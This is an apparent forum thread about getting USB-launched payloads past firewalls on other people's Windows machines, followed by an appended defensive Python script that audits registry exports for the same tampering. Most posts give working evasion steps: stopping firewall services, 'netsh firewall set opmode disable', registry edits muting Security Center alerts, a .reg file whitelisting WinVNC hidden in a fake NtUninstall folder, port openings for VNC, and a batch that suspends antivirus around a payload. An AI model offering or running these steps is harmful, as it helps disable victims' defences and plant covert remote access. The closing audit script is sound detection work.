Posted

hi,

wut if a host has a firewall up & running? because the fw will catch it, saying a program is trying to send mail. how does 1 overcome this kinda scenario??

thx in adv

Posted

You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"

Posted

erm ... for Net Stop to work u hafta know the other pc's Username & pwd and u hafta do it from an account that belongs to the Administrators grp.

Also, if ya kill the FW, especially on boxes with SP2 installed, da Security Centre's msgs will kick in n start displaying "not loaded" or some such msg. It may also start Windows' own "firewall", if it can b considered a fw at all - lol.

Any other thoughts on this?

thx in adv

Posted

It's quite easy to disable the security center popups in the registry, and you can also add rules to the windows firewall through the registry.

Posted
> erm ... for Net Stop to work u hafta know the other pc's Username & pwd and u hafta do it from an account that belongs to the Administrators grp.

The payload is executed by a local admin account. You don't have to have a username and password, it will use the default profile credentials.

Just add "net stop service" at the top of your payload, and then you can "net start service" at the end to put the firewall back to normal.

The only issue is if the firewall has a task tray icon (and I don't know many that don't). Once you stop the service, the icon changes to show the status of the firewall.

Posted
> You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"

Do you know the service name for the windows firewall?

Posted

You don't have to disable the Windows firewall, just add some registry entries and ur set. When using the WinVNC payload, you only have to add this registry file:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%systemroot%\\$NtUninstallKB21050c07160c070f0b0a0a05031b05$\\WinVNC.exe"="%systemroot%\\$NtUninstallKB21050c07160c070f0b0a0a05031b05$\\WinVNC.exe:*:Enabled:WinVnc"
"%appdata%\\NtUninstallKB21050c07160c070f0b0a0a05031b05\\WinVNC.exe"="%appdata%\\NtUninstallKB21050c07160c070f0b0a0a05031b05\\WinVNC.exe:*:Enabled:WinVnc"

Just save it as vnc.reg, and in your go.cmd import it using "reg import vnc.reg" or "regedit /s vnc.reg".

Posted

What I want to do is just to disable the firewall for a short space of time, not using the switchblade or hacksaw.

But I'm doing something else that is blocked by the firewall, and the message is: "For your protection Windows Firewall has blocked this operation" or something along those lines.

And I want to know if there is a way to turn it off, do what I want to do, and turn it back on again, by using a batch file etc.

Posted

I'm not using Windows Firewall myself, but I think that this should disable it:

netsh firewall set opmode disable

And to prevent the security center from popping up use this registry file:

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

"FirewallDisableNotify"=dword:00000001

Posted
> I'm not using Windows Firewall myself, but I think that this should disable it:
>
> netsh firewall set opmode disable

kewl thx :D

> And to prevent the security center from popping up use this registry file:
>
> Windows Registry Editor Version 5.00
>
> [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
>
> "FirewallDisableNotify"=dword:00000001

thx again :D

Posted
> You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"
>
> Do you know the service name for the windows firewall?

Just as a side note, if you know the admin pwd of a remote box which has remote registry enabled (i think it's enabled by default) then u can use PSList from http://www.SysInternals.com to get a list of services running on dat box n snipe em one by 1.

Posted

I really think you are better off using the netsh command than using premade registry entries, because if the comp does not successfully apply the reg key it could get screwed up and the box is FUBAR.

Also, for the problem with firewalls, I have just made a quick batch that pauses or suspends AV, spyware and firewall processes / services, launches the payload and then calls a batch that resumes or starts the processes / services.

Posted
> I'm not using Windows Firewall myself, but I think that this should disable it:
>
> netsh firewall set opmode disable
>
> And to prevent the security center from popping up use this registry file:
>
> Windows Registry Editor Version 5.00
>
> [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
>
> "FirewallDisableNotify"=dword:00000001

that worked. Cheers =]

Posted
> that worked. Cheers =]

No problem m8 :wink:

> I really think you are better off using the netsh command than using premade registry entries, because if the comp does not successfully apply the reg key it could get screwed up and the box is FUBAR.
>
> Also, for the problem with firewalls, I have just made a quick batch that pauses or suspends AV, spyware and firewall processes / services, launches the payload and then calls a batch that resumes or starts the processes / services.

Can you post it?? I'm making one too, but I don't have a lot of different av/fws to test it with.

Posted

If you follow a similar syntax you should be able to add any port you like:

netsh firewall add portopening TCP 5900 SMBv1

netsh firewall add portopening TCP 5800 SMBv2

netsh firewall add portopening UDP 5900 RDPv1

netsh firewall add portopening UDP 5800 RDPv2

It's basically "netsh firewall add portopening" and then the protocol, then the port, then the comment. BTW this is an example of how to apply it to VNC; TVNC does not use UDP but I included it as an example.

Posted
> If you follow a similar syntax you should be able to add any port you like:
>
> netsh firewall add portopening TCP 5900 SMBv1
>
> netsh firewall add portopening TCP 5800 SMBv2
>
> netsh firewall add portopening UDP 5900 RDPv1
>
> netsh firewall add portopening UDP 5800 RDPv2
>
> It's basically "netsh firewall add portopening" and then the protocol, then the port, then the comment. BTW this is an example of how to apply it to VNC; TVNC does not use UDP but I included it as an example.

But doesn't that only work with Windows' built-in firewall?

Posted

Yes, that's only for Windows Firewall; for others you will have to use the registry, and even then the AV might intercept it as a virus or trojan trying to tamper with its firewall.
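Every technique in this thread leaves a trace in two registry locations: the Security Center key (the FirewallDisableNotify value used to mute alerts), and the SharedAccess FirewallPolicy key, where "netsh firewall set opmode disable" clears EnableFirewall and where the AuthorizedApplications\List exceptions from the WinVNC .reg file live. The following script is an added example, not code from any poster, that audits a "reg export" of those keys for exactly these patterns. It assumes the XP/2003-era key layout shown in the thread; the sample export, the msmsgs.exe exception and the SUSPECT_DIRS heuristic are constructed for illustration.

```python
"""Audit a 'reg export' of the XP/2003-era firewall policy and Security Center
keys for the tampering patterns discussed in this thread: firewall switched off
(what 'netsh firewall set opmode disable' does), Security Center alerts muted,
and AuthorizedApplications exceptions pointing into user-writable directories."""
import re

SC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center"
FW_BASE = (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess"
           r"\Parameters\FirewallPolicy")
PROFILES = ("StandardProfile", "DomainProfile")
# Lowercase location hints that should not normally carry a firewall exception.
# The NtUninstall folder name is the hiding spot used by the payloads above.
SUSPECT_DIRS = ("%appdata%", "%temp%", "%tmp%", "\\temp\\", "ntuninstall",
                "\\documents and settings\\", "\\users\\")
NOTIFY_VALUES = ("FirewallDisableNotify", "AntiVirusDisableNotify", "UpdatesDisableNotify")


def _unescape(s):
    """Undo .reg string escaping of double quotes and backslashes."""
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg(text):
    """Parse .reg text into {key: {value_name: value}}. Strings and dwords are
    decoded, '-' marks a deletion (None); other types are kept as raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "Windows Registry Editor", "REGEDIT4")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = re.match(r'^"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if m is None or current is None:
            continue
        name, val = _unescape(m.group(1)), m.group(2)
        if val == "-":
            keys[current][name] = None
        elif val.lower().startswith("dword:"):
            keys[current][name] = int(val[6:], 16)
        elif len(val) >= 2 and val.startswith('"') and val.endswith('"'):
            keys[current][name] = _unescape(val[1:-1])
        else:
            keys[current][name] = val
    return keys


def audit(keys):
    """Return human-readable findings for a parsed export."""
    findings = []
    sc = keys.get(SC_KEY, {})
    for name in NOTIFY_VALUES:
        if sc.get(name) == 1:
            findings.append(f"Security Center: {name}=1 (alerts muted)")
    for prof in PROFILES:
        prof_key = f"{FW_BASE}\\{prof}"
        if keys.get(prof_key, {}).get("EnableFirewall") == 0:
            findings.append(f"{prof}: EnableFirewall=0 (firewall off)")
        exceptions = keys.get(f"{prof_key}\\AuthorizedApplications\\List", {})
        for name, val in exceptions.items():
            if not isinstance(val, str):
                continue
            # Value format: <path>:<scope>:<Enabled|Disabled>:<display name>;
            # split from the right so a drive-letter colon in <path> survives.
            parts = val.rsplit(":", 3)
            if len(parts) != 4:
                findings.append(f"{prof}: malformed exception {name!r}")
                continue
            path, _scope, state, label = parts
            if state.lower() == "enabled" and any(h in path.lower() for h in SUSPECT_DIRS):
                findings.append(f"{prof}: exception '{label}' allows {path} "
                                f"(user-writable or unusual location)")
            if path.lower() != name.lower():
                findings.append(f"{prof}: exception name {name!r} differs from path {path!r}")
    return findings


def audit_export(text):
    return audit(parse_reg(text))


# Constructed sample export (not from a real machine): one ordinary-looking
# exception next to the thread's pattern of muted alerts, EnableFirewall=0
# and a WinVNC exception living under %appdata%.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify"=dword:00000001
"AntiVirusDisableNotify"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\Program Files\\Messenger\\msmsgs.exe"="C:\\Program Files\\Messenger\\msmsgs.exe:*:Enabled:Windows Messenger"
"%appdata%\\NtUninstallKB21050c07160c070f0b0a0a05031b05\\WinVNC.exe"="%appdata%\\NtUninstallKB21050c07160c070f0b0a0a05031b05\\WinVNC.exe:*:Enabled:WinVnc"
"""

if __name__ == "__main__":
    for finding in audit_export(SAMPLE_EXPORT):
        print(finding)
```

On a live box the input would come from "reg export" of the two keys (run as an administrator), which is also a cheap thing to snapshot before and after a suspicious USB insertion: a diff of the two exports shows any new exception or flipped dword immediately, regardless of whether the tray icon or Security Center ever said anything.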
